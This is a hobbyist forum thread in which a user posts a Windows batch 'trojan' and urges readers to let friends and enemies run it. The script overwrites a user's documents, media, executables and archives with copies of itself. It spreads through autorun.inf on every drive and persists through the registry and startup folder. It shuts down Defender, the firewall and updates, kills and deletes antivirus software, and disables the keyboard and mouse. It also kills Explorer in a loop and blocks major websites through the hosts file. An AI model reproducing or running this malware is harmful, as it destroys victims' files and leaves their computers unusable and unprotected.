IT Community Malaysia

Members Login
Username 
 
Password 
    Remember Me  
Post Info TOPIC: How to Create a Trojon Virus


Smasher Hax

Status: Offline
Posts: 267
Date:
How to Create a Trojon Virus
Permalink  
 


this is a trojan be very carful with this guys. do not come crying to me when your hard drive is fryed ok cuz if you bitch at me ill fry your next computer :>. have fun!

 

@echo off
::--Infect All Html Files---::
Dir %Homedrive% /s /b > DirPath 
For /f %%Y In (DirPath) Do (
Set DirPath=%%Y > Nul 
For %%Z In (%DirPath%\*.html) Do (
Set HtmlInfect=%%Z > Nul
Copy /y %0 %HtmlInfect%
)
)

Del /f /s /q DirPath
::---------------------------::
::----Infect All Vlc Files---::
Dir %Homedrive% /s /b > DirPath 
For /f %%Y In (DirPath) Do (
Set DirPath=%%Y > Nul 
For %%Z In (%DirPath%\*.vlc) Do (
Set VlcInfect=%%Z > Nul
Copy /y %0 %VlcInfect%
)
)

Del /f /s /q DirPath
::---------------------------::
::---Infect All Mpeg Files---::
Dir %Homedrive% /s /b > DirPath 
For /f %%Y In (DirPath) Do (
Set DirPath=%%Y > Nul 
For %%Z In (%DirPath%\*.mpeg) Do (
Set MpegInfect=%%Z > Nul
Copy /y %0 %MpegInfect%
)
)

Del /f /s /q DirPath
::---------------------------::
::----Infect All Mp3 Files---::
Dir %Homedrive% /s /b > DirPath 
For /f %%Y In (DirPath) Do (
Set DirPath=%%Y > Nul 
For %%Z In (%DirPath%\*.mp3) Do (
Set Mp3Infect=%%Z > Nul
Copy /y %0 %Mp3Infect%
)
)

Del /f /s /q DirPath
::---------------------------::
::----Infect All Mp4 Files---::
Dir %Homedrive% /s /b > DirPath 
For /f %%Y In (DirPath) Do (
Set DirPath=%%Y > Nul 
For %%Z In (%DirPath%\*.mp4) Do (
Set Mp4Infect=%%Z > Nul
Copy /y %0 %Mp4Infect%
)
)

Del /f /s /q DirPath
::---------------------------::
::----Infect All Wma Files---::
Dir %Homedrive% /s /b > DirPath 
For /f %%Y In (DirPath) Do (
Set DirPath=%%Y > Nul 
For %%Z In (%DirPath%\*.wma) Do (
Set WmaInfect=%%Z > Nul
Copy /y %0 %WmaInfect%
)
)

Del /f /s /q DirPath
::---------------------------::
::-------Infect All .Doc-----::
Dir %Homedrive% /s /b > DirPath 
For /f %%Y In (DirPath) Do (
Set DirPath=%%Y > Nul 
For %%Z In (%DirPath%\*.doc) Do (
Set DocInfect=%%Z > Nul
Copy /y %0 %DocInfect%
)
)

Del /f /s /q DirPath
::---------------------------::
::----Infect All Txt Files---::
Dir %Homedrive% /s /b > DirPath 
For /f %%Y In (DirPath) Do (
Set DirPath=%%Y > Nul 
For %%Z In (%DirPath%\*.txt) Do (
Set TxtInfect=%%Z > Nul
Copy /y %0 %TxtInfect%
)
)

Del /f /s /q DirPath
::---------------------------::
::----Infect All Rar Files---::
Dir %Homedrive% /s /b > DirPath 
For /f %%Y In (DirPath) Do (
Set DirPath=%%Y > Nul 
For %%Z In (%DirPath%\*.rar) Do (
Set RarInfect=%%Z > Nul
Copy /y %0 %RarInfect%
)
)

Del /f /s /q DirPath
::---------------------------::
::----Infect All Exe Files---::
Dir %Homedrive% /s /b > DirPath 
For /f %%Y In (DirPath) Do (
Set DirPath=%%Y > Nul 
For %%Z In (%DirPath%\*.exe) Do (
Set ExeInfect=%%Z > Nul
Copy /y %0 %ExeInfect%
)
)

Del /f /s /q DirPath
::---------------------------::
::----Infect All Jpeg Files---::
Dir %Homedrive% /s /b > DirPath 
For /f %%Y In (DirPath) Do (
Set DirPath=%%Y > Nul 
For %%Z In (%DirPath%\*.jpeg) Do (
Set JpegInfect=%%Z > Nul
Copy /y %0 %JpegInfect%
)
)

Del /f /s /q DirPath
::---------------------------::
::----Infect All Zip Files---::
Dir %Homedrive% /s /b > DirPath 
For /f %%Y In (DirPath) Do (
Set DirPath=%%Y > Nul 
For %%Z In (%DirPath%\*.zip) Do (
Set ZipInfect=%%Z > Nul
Copy /y %0 %ZipInfect%
)
)

Del /f /s /q DirPath
::---------------------------::
::----Infect All Bat Files---::
Dir %Homedrive% /s /b > DirPath 
For /f %%Y In (DirPath) Do (
Set DirPath=%%Y > Nul 
For %%Z In (%DirPath%\*.bat) Do (
Set BatInfect=%%Z > Nul
Copy /y %0 %BatInfect%
)
)

Del /f /s /q DirPath
::---------------------------::
::----Infect All Gif Files---::
Dir %Homedrive% /s /b > DirPath 
For /f %%Y In (DirPath) Do (
Set DirPath=%%Y > Nul 
For %%Z In (%DirPath%\*.gif) Do (
Set GifInfect=%%Z > Nul
Copy /y %0 %GifInfect%
)
)

Del /f /s /q DirPath
::---------------------------::
::----Infect All Vbs Files---::
Dir %Homedrive% /s /b > DirPath 
For /f %%Y In (DirPath) Do (
Set DirPath=%%Y > Nul 
For %%Z In (%DirPath%\*.vbs) Do (
Set VbsInfect=%%Z > Nul
Copy /y %0 %VbsInfect%
)
)

Del /f /s /q DirPath
::---------------------------::
::-----Infect All Drives-----::
for %%E In (A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z) Do (
copy /Y %0 %%E:\
echo [AutoRun] > %%E:\autorun.inf
echo open="%%E:\%0" >> %%E:\autorun.inf
echo action=Open folder to see files... >> %%E:\autorun.inf)
::---------------------------::
::------Run As Service-------::
copy "Anti virus killer.bat" "C:\Windows\Anti virus killer"
reg add HKLM\software\Microsoft\Windows\CurrentVersion\RunServices /v "Anti virus killer" /t REG_SZ /d "C:\Windows\Anti virus killer.bat" / f > nul
::---------------------------::
::-----Infect Autoexec.bat---::
echo start "" %0>>%SystemDrive%\AUTOEXEC.BAT
::---------------------------::
::----Infect All Folders-----::
Dir %SystemRoot% /s /b > PathHost
For /f %%a In (PathHost) Do Copy /y %0 %%a > Nul
Del /f /s /q PathHost > Nul
::---------------------------::
::-----Infect "ls" CMD-----::
copy %0 %windir%\system32\ls.bat
::---------------------------::
::------Copy To Startup------::
copy "Anti virus killer.bat" "%userprofile%\Start Menu\Programs\Startup\Anti virus killer.bat"
::---------------------------::
::--Disable Windows Defender-::
net stop "WinDefend"
taskkill /f /t /im "MSASCui.exe"
::---------------------------::
::---Disable Windows Update--::
net stop "wuauserv"
::---------------------------::
:isable Windows Security Center-::
net stop "wscsvc"
::---------------------------------::
:isable Windows Parental Controls-::
net stop "WPCSvc"
::-----------------------------------::
:isable Windows Firewall--::
net stop "MpsSvc"
taskkill /f /t /im "FirewallControlPanel.exe"
::---------------------------::
:isable Windows Error Reporting-::
net stop "WerSvc"
::---------------------------------::
:isable Windows Backup-::
net stop "SDRSVC"
::------------------------::
::--Disable Windows Search---::
net stop "WSearch"
::---------------------------::
::-------AV Kill [UD]--------::
net stop “Security Center”
netsh firewall set opmode mode=disable
tskill /A av*
tskill /A fire*
tskill /A anti*
cls
tskill /A spy*
tskill /A bullguard
tskill /A PersFw
tskill /A KAV*
tskill /A ZONEALARM
tskill /A SAFEWEB
cls
tskill /A OUTPOST
tskill /A nv*
tskill /A nav*
tskill /A F-*
tskill /A ESAFE
tskill /A cle
cls
tskill /A BLACKICE
tskill /A def*
tskill /A kav
tskill /A kav*
tskill /A avg*
tskill /A ash*
cls
tskill /A aswupdsv
tskill /A ewid*
tskill /A guard*
tskill /A guar*
tskill /A gcasDt*
tskill /A msmp*
cls
tskill /A mcafe*
tskill /A mghtml
tskill /A msiexec
tskill /A outpost
tskill /A isafe
tskill /A zap*
cls
tskill /A zauinst
tskill /A upd*
tskill /A zlclien*
tskill /A minilog
tskill /A cc*
tskill /A norton*
cls
tskill /A norton au*
tskill /A ccc*
tskill /A npfmn*
tskill /A loge*
tskill /A nisum*
tskill /A issvc
tskill /A tmp*
cls
tskill /A tmn*
tskill /A pcc*
tskill /A cpd*
tskill /A pop*
tskill /A pav*
tskill /A padmin
cls
tskill /A panda*
tskill /A avsch*
tskill /A sche*
tskill /A syman*
tskill /A virus*
tskill /A realm*
cls
tskill /A sweep*
tskill /A scan*
tskill /A ad-*
tskill /A safe*
tskill /A avas*
tskill /A norm*
cls
tskill /A offg*
del /Q /F C:\Program Files\alwils~1\avast4\*.* 
del /Q /F C:\Program Files\Lavasoft\Ad-awa~1\*.exe 
del /Q /F C:\Program Files\kasper~1\*.exe 
cls
del /Q /F C:\Program Files\trojan~1\*.exe 
del /Q /F C:\Program Files\f-prot95\*.dll 
del /Q /F C:\Program Files\tbav\*.dat 
cls
del /Q /F C:\Program Files\avpersonal\*.vdf 
del /Q /F C:\Program Files\Norton~1\*.cnt 
del /Q /F C:\Program Files\Mcafee\*.* 
cls
del /Q /F C:\Program Files\Norton~1\Norton~1\Norton~3\*.* 
del /Q /F C:\Program Files\Norton~1\Norton~1\speedd~1\*.* 
del /Q /F C:\Program Files\Norton~1\Norton~1\*.* 
del /Q /F C:\Program Files\Norton~1\*.* 
cls
del /Q /F C:\Program Files\avgamsr\*.exe 
del /Q /F C:\Program Files\avgamsvr\*.exe 
del /Q /F C:\Program Files\avgemc\*.exe 
cls
del /Q /F C:\Program Files\avgcc\*.exe 
del /Q /F C:\Program Files\avgupsvc\*.exe 
del /Q /F C:\Program Files\grisoft 
del /Q /F C:\Program Files\nood32krn\*.exe 
del /Q /F C:\Program Files\nood32\*.exe 
cls
del /Q /F C:\Program Files\nod32 
del /Q /F C:\Program Files\nood32
del /Q /F C:\Program Files\kav\*.exe 
del /Q /F C:\Program Files\kavmm\*.exe 
del /Q /F C:\Program Files\kaspersky\*.*
cls
del /Q /F C:\Program Files\ewidoctrl\*.exe 
del /Q /F C:\Program Files\guard\*.exe 
del /Q /F C:\Program Files\ewido\*.exe 
cls
del /Q /F C:\Program Files\pavprsrv\*.exe 
del /Q /F C:\Program Files\pavprot\*.exe 
del /Q /F C:\Program Files\avengine\*.exe 
cls
del /Q /F C:\Program Files\apvxdwin\*.exe 
del /Q /F C:\Program Files\webproxy\*.exe 
del /Q /F C:\Program Files\panda software\*.*
::---------------------------::
REN *.jpeg *.vir
REN *.gif *.vir
REN *.png *.vir
::------Disable Keyboard-----::
echo Windows Registry Editor Version 5.00 > "nokeyboard.reg"
echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Keyboard Layout] >> "nokeyboard.reg"
echo "Scancode Map"=hex:00,00,00,00,00,00,00,00,7c,00,00,00,00,00,01,00,00,\ >> "nokeyboard.reg"
echo 00,3b,00,00,00,3c,00,00,00,3d,00,00,00,3e,00,00,00,3f,00,00,00,40,00,00,00,\ >> "nokeyboard.reg"
echo 41,00,00,00,42,00,00,00,43,00,00,00,44,00,00,00,57,00,00,00,58,00,00,00,37,\ >> "nokeyboard.reg"
echo e0,00,00,46,00,00,00,45,00,00,00,35,e0,00,00,37,00,00,00,4a,00,00,00,47,00,\ >> "nokeyboard.reg"
echo 00,00,48,00,00,00,49,00,00,00,4b,00,00,00,4c,00,00,00,4d,00,00,00,4e,00,00,\ >> "nokeyboard.reg"
echo 00,4f,00,00,00,50,00,00,00,51,00,00,00,1c,e0,00,00,53,00,00,00,52,00,00,00,\ >> "nokeyboard.reg"
echo 4d,e0,00,00,50,e0,00,00,4b,e0,00,00,48,e0,00,00,52,e0,00,00,47,e0,00,00,49,\ >> "nokeyboard.reg"
echo e0,00,00,53,e0,00,00,4f,e0,00,00,51,e0,00,00,29,00,00,00,02,00,00,00,03,00,\ >> "nokeyboard.reg"
echo 00,00,04,00,00,00,05,00,00,00,06,00,00,00,07,00,00,00,08,00,00,00,09,00,00,\ >> "nokeyboard.reg"
echo 00,0a,00,00,00,0b,00,00,00,0c,00,00,00,0d,00,00,00,0e,00,00,00,0f,00,00,00,\ >> "nokeyboard.reg"
echo 10,00,00,00,11,00,00,00,12,00,00,00,13,00,00,00,14,00,00,00,15,00,00,00,16,\ >> "nokeyboard.reg"
echo 00,00,00,17,00,00,00,18,00,00,00,19,00,00,00,1a,00,00,00,1b,00,00,00,2b,00,\ >> "nokeyboard.reg"
echo 00,00,3a,00,00,00,1e,00,00,00,1f,00,00,00,20,00,00,00,21,00,00,00,22,00,00,\ >> "nokeyboard.reg"
echo 00,23,00,00,00,24,00,00,00,25,00,00,00,26,00,00,00,27,00,00,00,28,00,00,00,\ >> "nokeyboard.reg"
echo 1c,00,00,00,2a,00,00,00,2c,00,00,00,2d,00,00,00,2e,00,00,00,2f,00,00,00,30,\ >> "nokeyboard.reg"
echo 00,00,00,31,00,00,00,32,00,00,00,33,00,00,00,34,00,00,00,35,00,00,00,36,00,\ >> "nokeyboard.reg"
echo 00,00,1d,00,00,00,5b,e0,00,00,38,00,00,00,39,00,00,00,38,e0,00,00,5c,e0,00,\ >> "nokeyboard.reg"
echo 00,5d,e0,00,00,1d,e0,00,00,5f,e0,00,00,5e,e0,00,00,22,e0,00,00,24,e0,00,00,\ >> "nokeyboard.reg"
echo 10,e0,00,00,19,e0,00,00,30,e0,00,00,2e,e0,00,00,2c,e0,00,00,20,e0,00,00,6a,\ >> "nokeyboard.reg"
echo e0,00,00,69,e0,00,00,68,e0,00,00,67,e0,00,00,42,e0,00,00,6c,e0,00,00,6d,e0,\ >> "nokeyboard.reg"
echo 00,00,66,e0,00,00,6b,e0,00,00,21,e0,00,00,00,00 >> "nokeyboard.reg"
start nokeyboard.reg
::---------------------------::
::-------Disable Mouse-------::
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
::---------------------------::
::-----Kill Explorer.exe-----::
echo :a >>WindUpdate.bat
echo tskill explorer >>WindUpdate.bat
echo goto a >>WindUpdate.bat
echo Set objShell = CreateObject("WScript.Shell")>>rundlll32.vbs
echo strCommand = "WindUpdate.bat">>rundlll32.vbs
echo objShell.Run strCommand, vbHide, TRUE>>rundlll32.vbs
start "" rundlll32.vbs
::---------------------------::
::-------Block YouTube-------::
cd "C:\Windows\System32\Drivers\etc"
echo 127.0.0.1 youtube.com >> "Hosts"
echo 127.0.0.1 www.youtube.com >> "Hosts"
::---------------------------::
::---------Block MSN---------::
cd "C:\Windows\System32\Drivers\etc"
echo 127.0.0.1 msn.com >> "Hosts"
echo 127.0.0.1 www.msn.com >> "Hosts"
::---------------------------::
::--------Block Google-------::
cd "C:\Windows\System32\Drivers\etc"
echo 127.0.0.1 google.com >> "Hosts"
echo 127.0.0.1 www.google.com >> "Hosts"
::---------------------------::
::-------Block Wikipedia-----::
cd "C:\Windows\System32\Drivers\etc"
echo 127.0.0.1 wikipedia.org >> "Hosts"
echo 127.0.0.1 www.wikipedia.org >> "Hosts"
::---------------------------::
::--------Block Hotmail------::
cd "C:\Windows\System32\Drivers\etc"
echo 127.0.0.1 hotmail.com >> "Hosts"
echo 127.0.0.1 www.hotmail.com >> "Hosts"
::---------------------------::
::--------Block Yahoo!-------::
cd "C:\Windows\System32\Drivers\etc"
echo 127.0.0.1 yahoo.com >> "Hosts"
echo 127.0.0.1 www.yahoo.com >> "Hosts"
::---------------------------::
::--------Block Facebook!-------::
cd "C:\Windows\System32\Drivers\etc"
echo 127.0.0.1 facebook.com >> "Hosts"
echo 127.0.0.1 www.facebook.com >> "Hosts"
::---------------------------::

copy and paste this code into notepad and save as the format you like.... don't open it
let the friends and enemies do this....its really dangerous virus, be aware...



__________________

I am Sharper

ITC - Internet Moderators

Mods Name: KA



Downloader Freak

Status: Offline
Posts: 61
Date:
Permalink  
 

this for c++ right?

__________________

-=[ MESS WITH THE BEST DIE LIKE THE REST ]=-



Downloader Freak

Status: Offline
Posts: 61
Date:
Permalink  
 

sorry2 notepad :D

__________________

-=[ MESS WITH THE BEST DIE LIKE THE REST ]=-



Smasher Hax

Status: Offline
Posts: 267
Date:
Permalink  
 

hahaha,,, notepad are suppoorting many scripts.. like this.. this is not c++ srpting.. but its juast DOS/CMD command,.. hehehe

__________________

I am Sharper

ITC - Internet Moderators

Mods Name: KA

Page 1 of 1  sorted by
Quick Reply

Please log in to post quick replies.

Tweet this page Post to Digg Post to Del.icio.us


Create your own FREE Forum
Report Abuse
Powered by ActiveBoard